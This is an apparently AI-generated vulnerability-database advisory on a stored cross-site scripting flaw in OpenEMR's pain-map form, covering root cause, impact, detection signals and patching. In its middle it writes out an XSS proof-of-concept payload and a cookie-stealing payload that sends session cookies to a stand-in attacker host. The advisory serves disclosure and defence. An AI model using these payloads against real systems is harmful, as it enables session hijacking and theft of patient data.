
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-32118 is a stored cross-site scripting (XSS) vulnerability in OpenEMR's Graphical Pain Map ("clickmap") form that allows any authenticated clinician to inject arbitrary JavaScript executed in the browsers of all subsequent users who view the affected encounter form. Affecting all OpenEMR versions prior to 8.0.0.1, the flaw is compounded by session cookies not being marked HttpOnly, enabling full session hijacking including of administrator accounts. The vulnerability was published on March 11, 2026, and patched in OpenEMR 8.0.0.1. It carries a CVSS v3.1 base score of 5.4 (Moderate) per the GitHub advisory, though Feedly's aggregated scoring places it at 9.0 (Critical) based on the full session hijacking impact (GitHub Advisory).
The root cause (CWE-79) lies in library/js/clickmap.js, where the fn_buildMarker function decodes a URL-encoded annotation via decodeURIComponent() and concatenates it directly into an HTML string passed to jQuery's $() constructor — causing jQuery to parse and render it as live DOM elements with active event handlers. No HTML sanitization exists at any layer: the server-side Controller::populate_object() applies only SQL escaping (mysqli_real_escape_string) without HTML encoding, and the Smarty template outputs the raw database value into a JavaScript string literal without enabling escape_html. On page load, fn_load re-passes each stored annotation through fn_buildMarker, restoring the original HTML payload via decodeURIComponent() and injecting it into the DOM. The aggravating factor is that SessionConfigurationBuilder.php sets HttpOnly = false on session cookies, making session token exfiltration via XSS trivially achievable (GitHub Advisory).
Successful exploitation allows an authenticated clinician with low privileges to persistently inject malicious JavaScript that executes in the browsers of every subsequent user — including other clinicians and administrators — who views the affected encounter form or its encounter report. Because session cookies lack the HttpOnly flag, attackers can directly exfiltrate session tokens, enabling full session hijacking and impersonation of any user including administrators. In a healthcare environment, this translates to unauthorized access to protected health information (PHI), privilege escalation within the application, and potential HIPAA regulatory violations (GitHub Advisory).
A proof-of-concept (PoC) with step-by-step reproduction instructions and a specific payload (<img src=x onerror=alert(document.domain)>) is publicly available in the GitHub security advisory. The EPSS score is approximately 0.029% (0.000290), indicating low current automated exploitation probability. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated account with permission to create encounter forms, limiting the attack surface to internal or compromised clinician accounts (GitHub Advisory).
<img src=x onerror=alert(document.domain)> or a cookie-stealing script like <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">.encodeURIComponent(), stored via save.php with only SQL escaping, and persisted to the database without HTML sanitization.decodeURIComponent() in fn_buildMarker and injected as live HTML into the DOM, executing the script./interface/clickmap/) by multiple different users shortly after a single clinician saved a form; server-side logs recording POST requests to save.php with URL-encoded HTML tags (%3Cimg, %3Cscript) in annotation fields.save.php database entries in the clickmap data table for annotation values containing encoded HTML tags or JavaScript event handlers.%3Cimg+src%3Dx+onerror%3D or %3Cscript%3E in annotation fields (GitHub Advisory).The vulnerability is fixed in OpenEMR 8.0.0.1; all users should upgrade immediately. As additional hardening measures, administrators should configure session cookies with the HttpOnly and Secure flags in src/Common/Session/SessionConfigurationBuilder.php to prevent JavaScript-based session token theft even if XSS payloads are present. Deploying a Web Application Firewall (WAF) with XSS detection rules can provide a compensating control for organizations unable to upgrade immediately. Restricting clinician permissions to create or edit encounter forms can reduce the attack surface until patching is complete (GitHub Advisory).
The vulnerability was reported by researcher pavelkohout396 and analyzed by simecek, as credited in the GitHub advisory. Security blog Infinitsec published a post specifically covering CVE-2026-32118 shortly after disclosure. Aisle security research published a broader report noting 38 critical security vulnerabilities discovered in healthcare software used by 100,000 providers, which appears to include this finding, highlighting systemic security concerns in healthcare EHR platforms (GitHub Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."